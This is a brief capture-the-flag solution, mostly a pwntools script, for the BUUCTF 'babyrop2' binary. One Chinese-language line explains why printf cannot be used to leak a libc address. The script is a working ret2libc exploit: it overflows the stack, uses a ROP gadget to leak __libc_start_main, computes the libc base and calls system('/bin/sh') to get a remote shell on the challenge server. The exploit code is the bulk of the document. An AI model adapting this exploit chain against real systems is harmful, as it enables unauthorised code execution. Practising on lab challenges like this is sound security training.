ret2libc。记一下因为这里的libc版本为libc6_2.27-3ubuntu1.2_amd64,printf()的plt表地址结尾为f00,会产生截断,所以不能用printf()泄露。可以使用__libc_start_main。
from pwn import *
elf = ELF('./babyrop2')
local = 0
if local == 1:
io = process('./babyrop2')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
io = remote('node4.buuoj.cn',25717)
libc = ELF('libc.so.6')
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
libc_start_main = elf.got['__libc_start_main']
main_addr = 0x400636
rdi_ret = 0x0000000000400733
payload = 'a'*0x20+p64(0xdeadbeef)+p64(rdi_ret)+p64(libc_start_main)+p64(printf_plt)+p64(main_addr)
io.sendline(payload)
io.recvline()
libc_start_main_addr = u64(io.recv(6)+'\x00\x00')
libc_base = libc_start_main_addr - libc.symbols['__libc_start_main']
log.success("libc_base:"+hex(libc_base))
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + libc.search('/bin/sh').next()
payload = 'a'*0x20+p64(0xdeadbeef)+p64(rdi_ret)+p64(binsh)+p64(system_addr)
io.sendline(payload)
io.interactive()
